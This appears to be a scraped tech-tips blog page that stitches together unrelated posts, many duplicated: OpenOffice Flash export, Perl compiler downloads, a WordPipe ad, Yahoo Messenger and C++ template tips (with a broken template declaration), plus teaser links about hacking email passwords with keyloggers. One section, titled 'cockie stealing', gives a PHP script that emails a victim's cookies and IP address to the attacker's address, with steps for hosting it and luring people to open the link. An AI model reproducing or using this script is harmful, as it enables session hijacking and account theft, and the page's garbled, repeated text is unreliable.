Win+R to open the Run dialogEnter %windir% to open the Windows directoryAlt+F W S to open the File menu, choose the New menu item, then the Shortcut menu itemGo through the wizard to create a shortcut to the desired programThe name you give the shortcut is what you type in the Run dialog to start the program
Create A Flash Presentation For Free With Open Office
What is Open Office?
It is a free, open source, cross platform office suite that has a lot of the same features as popular commercial suites.
Being that it's cross platform means it can be compiled for just about anything, Windows, Linux / Unix, Mac, etc..
Using Open Office Presentation
Basically, if you've ever used Microsoft PowerPoint, you've pretty much used Presentation. It's a slide show (or presentation) creator that lets you create any style slide show you want.
You can have text, graphics, charts, etc... or any combination
It does not take much to figure out Presentation. You can add text or picture boxes, add designs, add tables and pretty much anything you can think of.
After you have created the presentation, here's where you convert it to Flash:
Step1:You simply go in to the 'file' menu and select 'Export'.
Step 2:A 'save as' dialog box will come up where you can choose the file name, location and the format you want.
Step 3:From the pull down box you will see the 'Macromedia Flash (SWF)' option, that's the one you want.
Step 4:Select the format, pick your location, name the file and press the Save button.
That's it.. you now have a Macromedia Flash version of your presentation that you can include on your website.
Why would you want this?
Macromedia Flash is pretty much a standard for multimedia on the web, as a result there is a plug-in for almost every browser and most people already have this plug-in.This gives you the chance to put Flash content on your site without having to play for the Macromedia Suite.
About The Author
Steve Howson is the Webmaster for SG Network Technologies web hosting company.
It is a free, open source, cross platform office suite that has a lot of the same features as popular commercial suites.
Being that it's cross platform means it can be compiled for just about anything, Windows, Linux / Unix, Mac, etc..
Using Open Office Presentation
Basically, if you've ever used Microsoft PowerPoint, you've pretty much used Presentation. It's a slide show (or presentation) creator that lets you create any style slide show you want.
You can have text, graphics, charts, etc... or any combination
It does not take much to figure out Presentation. You can add text or picture boxes, add designs, add tables and pretty much anything you can think of.
After you have created the presentation, here's where you convert it to Flash:
Step1:You simply go in to the 'file' menu and select 'Export'.
Step 2:A 'save as' dialog box will come up where you can choose the file name, location and the format you want.
Step 3:From the pull down box you will see the 'Macromedia Flash (SWF)' option, that's the one you want.
Step 4:Select the format, pick your location, name the file and press the Save button.
That's it.. you now have a Macromedia Flash version of your presentation that you can include on your website.
Why would you want this?
Macromedia Flash is pretty much a standard for multimedia on the web, as a result there is a plug-in for almost every browser and most people already have this plug-in.This gives you the chance to put Flash content on your site without having to play for the Macromedia Suite.
About The Author
Steve Howson is the Webmaster for SG Network Technologies web hosting company.
Compiling Perl codes
Active Perl
Features
Complete ActivePerl Package
* Perl
Binary of core Perl distribution
* Perl Package Manager
ActiveState's Perl extension installer and manager; allows for easy installation and management of modules and extensions
* Installers
A variety of installers are available for quick installation of ActivePerl:
o AIX: ActiveState installer packages
o HP-UX: ActiveState installer packages
o Linux: Redhat, Debian and ActiveState installer packages
o Mac OS X: Disk image containing the installer package
o Solaris: Sun and ActiveState installer packages
o Windows: Mcft Windows (MSI) and ActiveState installer packages
* Complete online documentation
Windows Version Extras
* Perl for ISAPI
IIS plug-in to enhance the speed of standard Perl
* PerlScript
ActiveX scripting engine, like JavaScript or VBScript with a Perl brain
* PerlEz
Embedded Perl
http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.813-MSWin32-x86-148120.msi
OR
visit
http://downloads.activestate.com/ActivePerl/Windows/5.8/
for previous versions..
****************** not reccomended ************************
Perl2Exe
Perl2Exe is a command line program for converting perl scripts to executable files.
This allows you to create stand alone programs in perl that do not require the perl interpreter. You can ship the executable files without having to ship your perl source code.
Perl2Exe can generate executables for Windows and Unix target hosts.
Perl2Exe can generate cross-platform code. For example you can generate code for Solaris from a Linux machine.
Perl2Exe also allows you to create no-console programs using Tk.
Download Perl2Exe for Win32 V8.60
http://www.indigostar.com/download/p2x-8.60-Win32.zip
(win 32)
Instruction Manual:
http://www.indigostar.com/pxman.htm
cockie stealing..
For php mail sender download mysql it is a s/w like .RAR file...
if you don't have mysql then .PHP file will not work in ur pc...
1.Download mysql...ask ne for the link....or find in google...
2.Copy the code and paste in notepad and save as extention.PHP
The code is given here:-
$to="myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
?>
3.now upload on the internet...and as u give that link to anyone as he opens that link his/her coockies u will get it on ur mail......
EDIT THE 1st LINE AS YOUR E-MAIL THERE....THIS LINE-$to="myemail@yahoo.com";
if you don't have mysql then .PHP file will not work in ur pc...
1.Download mysql...ask ne for the link....or find in google...
2.Copy the code and paste in notepad and save as extention.PHP
The code is given here:-
$to="myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
?>
3.now upload on the internet...and as u give that link to anyone as he opens that link his/her coockies u will get it on ur mail......
EDIT THE 1st LINE AS YOUR E-MAIL THERE....THIS LINE-$to="myemail@yahoo.com";
Change Your Word Docs In Record Time
Anyone who has ever used Microsoft Word knows that it is a powerful word processing package. It's loaded with dozens of features designed to make creating documents a breeze. And anyone who has used Word's Find and Replace feature knows that this is one handy feature. It makes changing words or phrases throughout your documents fast and painless.And that's great when you're working on just one document. But suppose you need to find and then replace a word or phrase throughout all of your Microsoft documents or throughout all documents located within a particular directory?
You know, like when there's been a change to your business address or telephone number? Or when there's been a change of ownership, or upper management, or to the board of directors?
You could use the Find and Replace feature to change your documents one by one. Using this feature will make changes faster than not using it. But if you're changing lots of documents and you need to make the changes rapidly, you need something more.
And that's exactly the reason why WordPipe was invented. WordPipe is a stand-alone add-in tool for Microsoft Word. Use this incredible add-in to instantly modify ALL text, links or images located on your web site or on your file server. How instantly can changes be made? Users report that 500 changes can be made in about twenty minutes!
Today's business world is in a constant state of change. And to keep up with these changes, and to keep your business on the cutting edge of technology, your business will experience change. Document links change when you consolidate your servers and even when you are simply replacing or renaming documents. Web addresses change, names of key players within your company change, product versions and other information changes ? there's just no end to the amount and type of information that changes when you run a business.
And those with whom you do business need to know about these changes the moment they occur. Time is money so any way you can cut down on the amount of time a task takes, the less money you waste.
IT departments love WordPipe.
But even if your business is not yet large enough to hire a full-time IT staff, you won't lose with WordPipe. WordPipe is accountable, too! Its change log lets you know exactly where it made changes.
It doesn't matter whether you need to find and replace information that is contained inside headers, footers, textboxes, links, hyperlinks, hyperlink addresses, field codes or any other built-in or customized document property, in any folder or sub-folder. Even files marked as read-only can be modified using the special tool.
Need to change your company logo wherever it appears in your documents? No problem. WordPipe will work on a number of file types including .doc, .rtf, .html, .htm, .dot, .txt, .asc, .ans, .wri, .mcw, .wpd, .wps or any custom document type.
WordPipe supports all versions of Microsoft Word except Word 97 and earlier. This add-in runs on Windows 95, 98, ME, NT, 2000, XP and 2003.
Author: Cavyl Stewart.
You know, like when there's been a change to your business address or telephone number? Or when there's been a change of ownership, or upper management, or to the board of directors?
You could use the Find and Replace feature to change your documents one by one. Using this feature will make changes faster than not using it. But if you're changing lots of documents and you need to make the changes rapidly, you need something more.
And that's exactly the reason why WordPipe was invented. WordPipe is a stand-alone add-in tool for Microsoft Word. Use this incredible add-in to instantly modify ALL text, links or images located on your web site or on your file server. How instantly can changes be made? Users report that 500 changes can be made in about twenty minutes!
Today's business world is in a constant state of change. And to keep up with these changes, and to keep your business on the cutting edge of technology, your business will experience change. Document links change when you consolidate your servers and even when you are simply replacing or renaming documents. Web addresses change, names of key players within your company change, product versions and other information changes ? there's just no end to the amount and type of information that changes when you run a business.
And those with whom you do business need to know about these changes the moment they occur. Time is money so any way you can cut down on the amount of time a task takes, the less money you waste.
IT departments love WordPipe.
But even if your business is not yet large enough to hire a full-time IT staff, you won't lose with WordPipe. WordPipe is accountable, too! Its change log lets you know exactly where it made changes.
It doesn't matter whether you need to find and replace information that is contained inside headers, footers, textboxes, links, hyperlinks, hyperlink addresses, field codes or any other built-in or customized document property, in any folder or sub-folder. Even files marked as read-only can be modified using the special tool.
Need to change your company logo wherever it appears in your documents? No problem. WordPipe will work on a number of file types including .doc, .rtf, .html, .htm, .dot, .txt, .asc, .ans, .wri, .mcw, .wpd, .wps or any custom document type.
WordPipe supports all versions of Microsoft Word except Word 97 and earlier. This add-in runs on Windows 95, 98, ME, NT, 2000, XP and 2003.
Author: Cavyl Stewart.
Change The Title Text of your Yahoo Messenger
Here’s how you change the title text that appears at the top of the Messenger window. By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following:
[APP TITLE]
caption=YOUR TEXT
Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.
[APP TITLE]
caption=YOUR TEXT
Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.
C++ Function Templates
C++ Function templates are those functions which can handle different data types without separate code for each of them. For a similar operation on several kinds of data types, a programmer need not write different versions by overloading a function. It is enough if he writes a C++ template based function. This will take care of all the data types.There are two types of templates in C++, viz., function templates and class templates. This article deals with only the function templates.
There are lot of occasions, where we might need to write the same functions
for different data types. A favorite example can be addition of two variables.
The variable can be integer, float or double. The requirement will be to return
the corresponding return type based on the input type. If we start writing one
function for each of the data type, then we will end up with 4 to 5 different
functions, which can be a night mare for maintenance.
C++ templates come to our rescue in such situations. When we use C++ function templates, only one function signature needs to be created. The C++ compiler will automatically generate the required functions for handling the individual data types. This is how a programmer's life is made a lot easier.
C++ Template functions - Details:
Let us assume a small example for Add function. If the requirement is to use this Add function for both integer and float, then two functions are to be created for each of the data type (overloading).
int Add(int a,int b) { return a+b;} // function Without C++ template
float Add(float a, float b) { return a+b;} // function Without C++ template
If there are some more data types to be handled, more functions should be
added.
But if we use a c++ function template, the whole process is reduced to a single
c++ function template. The following will be the code fragment for Add
function.
template
T Add(T a, T b) //C++ function template sample
{
return a+b;
}
This c++ function template definition will be enough. Now when the integer version of the function, the compiler generates an Add function compatible for integer data type and if float is called it generates float type and so on.Here T is the typename. This is dynamically determined by the compiler according to the parameter passed. The keyword class means, the parameter can be of any type. It can even be a class.
C++ Template functions - Applicability:
C++ function templates can be used wherever the same functionality has to be performed with a number of data types. Though very useful, lots of care should be taken to test the C++ template functions during development. A well written c++ template will go a long way in saving time for programmers.
About The Author Muthukumar
There are lot of occasions, where we might need to write the same functions
for different data types. A favorite example can be addition of two variables.
The variable can be integer, float or double. The requirement will be to return
the corresponding return type based on the input type. If we start writing one
function for each of the data type, then we will end up with 4 to 5 different
functions, which can be a night mare for maintenance.
C++ templates come to our rescue in such situations. When we use C++ function templates, only one function signature needs to be created. The C++ compiler will automatically generate the required functions for handling the individual data types. This is how a programmer's life is made a lot easier.
C++ Template functions - Details:
Let us assume a small example for Add function. If the requirement is to use this Add function for both integer and float, then two functions are to be created for each of the data type (overloading).
int Add(int a,int b) { return a+b;} // function Without C++ template
float Add(float a, float b) { return a+b;} // function Without C++ template
If there are some more data types to be handled, more functions should be
added.
But if we use a c++ function template, the whole process is reduced to a single
c++ function template. The following will be the code fragment for Add
function.
template
T Add(T a, T b) //C++ function template sample
{
return a+b;
}
This c++ function template definition will be enough. Now when the integer version of the function, the compiler generates an Add function compatible for integer data type and if float is called it generates float type and so on.Here T is the typename. This is dynamically determined by the compiler according to the parameter passed. The keyword class means, the parameter can be of any type. It can even be a class.
C++ Template functions - Applicability:
C++ function templates can be used wherever the same functionality has to be performed with a number of data types. Though very useful, lots of care should be taken to test the C++ template functions during development. A well written c++ template will go a long way in saving time for programmers.
About The Author Muthukumar
-
One of the most frequently asked question is how to hack yahoo or how to hack an Email password .There are several programs known as keylog...
-
This guide will show you how to edit/rename the Windows XP start menu button.Are you bored of having the name “start”? If so now you can ren...
-
One of most the frequently asked question is how to track an email back to the sender.That is how to determine the sender of the email? The ...










